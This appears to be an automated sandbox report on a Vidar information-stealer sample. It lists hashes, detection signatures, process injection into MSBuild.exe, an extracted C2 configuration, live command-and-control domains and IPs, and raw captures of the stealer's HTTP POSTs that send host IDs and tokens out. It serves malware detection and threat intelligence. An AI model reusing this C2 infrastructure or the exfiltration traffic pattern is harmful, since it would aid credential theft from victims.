Edit tour

Windows Analysis Report
lCVFGKfczi.exe

Overview

General Information

Sample name:	lCVFGKfczi.exe renamed because original name is a hash value
Original sample name:	b84100c670bb19e92bfb62423048aa43.exe
Analysis ID:	1528302
MD5:	b84100c670bb19e92bfb62423048aa43
SHA1:	592f3aef7ad93db6527d8e9d06b2ebbae1a51a79
SHA256:	7823532217e8b06b102734023019188833b3e0ae711c3dc6f9cb437d8c48d14b
Tags:	32exetrojan
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Powershell download and execute

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

Machine Learning detection for sample

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

One or more processes crash

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

lCVFGKfczi.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\lCVFGKfczi.exe" MD5: B84100C670BB19E92BFB62423048AA43)

MSBuild.exe (PID: 7420 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 7428 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 7436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 8020 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1428 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7512 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 276 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "af641acce3f8c85bf2490a9b3aa972c5"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: lCVFGKfczi.exe PID: 7404	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: lCVFGKfczi.exe PID: 7404	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: lCVFGKfczi.exe PID: 7404	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MSBuild.exe PID: 7436	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7436	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: MSBuild.exe PID: 7436	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7436	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.MSBuild.exe.400000.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.MSBuild.exe.400000.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
3.2.MSBuild.exe.400000.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.MSBuild.exe.400000.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.lCVFGKfczi.exe.dedad8.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.lCVFGKfczi.exe.dedad8.1.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.lCVFGKfczi.exe.dedad8.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.lCVFGKfczi.exe.dedad8.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.lCVFGKfczi.exe.dc0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.lCVFGKfczi.exe.dc0000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 95.164.90.97, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7436, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49743

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T18:46:35.930186+0200	2044247	1	Malware Command and Control Activity Detected	95.164.90.97	80	192.168.2.4	49743	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T18:46:10.427105+0200	2051831	1	Malware Command and Control Activity Detected	95.164.90.97	80	192.168.2.4	49743	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T18:46:34.937813+0200	2049087	1	A Network Trojan was detected	192.168.2.4	49743	95.164.90.97	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: lCVFGKfczi.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://t.me/ae5ed	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "af641acce3f8c85bf2490a9b3aa972c5"}

Multi AV Scanner detection for submitted file

Source: lCVFGKfczi.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: lCVFGKfczi.exe

Joe Sandbox ML: detected

Source: lCVFGKfczi.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49748 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49770 version: TLS 1.2

Source: lCVFGKfczi.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\lCVFGKfczi.exe

Code function: 0_2_00DD9ABF FindFirstFileExW,

0_2_00DD9ABF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,

3_2_00415142

Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	0_2_00DEE385
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	0_2_00DEE385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	3_2_004014AD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49743 -> 95.164.90.97:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.164.90.97:80 -> 192.168.2.4:49743
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.164.90.97:80 -> 192.168.2.4:49743

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199780418869

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBFCBKFIDHIDHDHIEHost: lade.petperfectcare.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 37 43 44 36 35 44 46 37 41 45 31 33 30 31 39 37 39 34 31 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="hwid"857CD65DF7AE1301979414-a33c7340-61ca------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------ECGDBFCBKFIDHIDHDHIE--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGIHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 2d 2d 0d 0a Data Ascii: ------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="mode"1------BFIIIDAFBFBKECBGDBGI--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFHHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="mode"2------KFHJJDHJEGHJKECBGCFH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFHHost: lade.petperfectcare.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="mode"21------KFHJJDHJEGHJKECBGCFH--

Source: Joe Sandbox View

IP Address: 95.164.90.97 95.164.90.97

Source: Joe Sandbox View

ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown

HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49748 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.23
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.23
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.100.168
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.100.168
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00406963 InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile,

3_2_00406963

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: lade.petperfectcare.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBFCBKFIDHIDHDHIEHost: lade.petperfectcare.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 37 43 44 36 35 44 46 37 41 45 31 33 30 31 39 37 39 34 31 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="hwid"857CD65DF7AE1301979414-a33c7340-61ca------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------ECGDBFCBKFIDHIDHDHIE--

Source: lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011DB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1981603687.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com//(
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/4
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/T
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/c
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/f
Source: lCVFGKfczi.exe, lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.1980647487.00000000004B3000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.00000000004F0000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80
Source: MSBuild.exe, 00000003.00000002.1980647487.000000000048F000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80/sql.dll
Source: MSBuild.exe, 00000003.00000002.1980647487.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80/sql.dllineID:
Source: MSBuild.exe, 00000003.00000002.1980647487.00000000004F0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80e
Source: lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80nfwqnfwovfdkhttps://steamcommunity.com/profiles/76561199780418869u5
Source: MSBuild.exe, 00000003.00000002.1980647487.00000000004B3000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80t-Disposition:
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: lCVFGKfczi.exe, lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: lCVFGKfczi.exe, lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5edu55uhttps://steamcommunity.com/profiles/76561199780418869sql.dllsqlp.dllMozilla/5.

Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
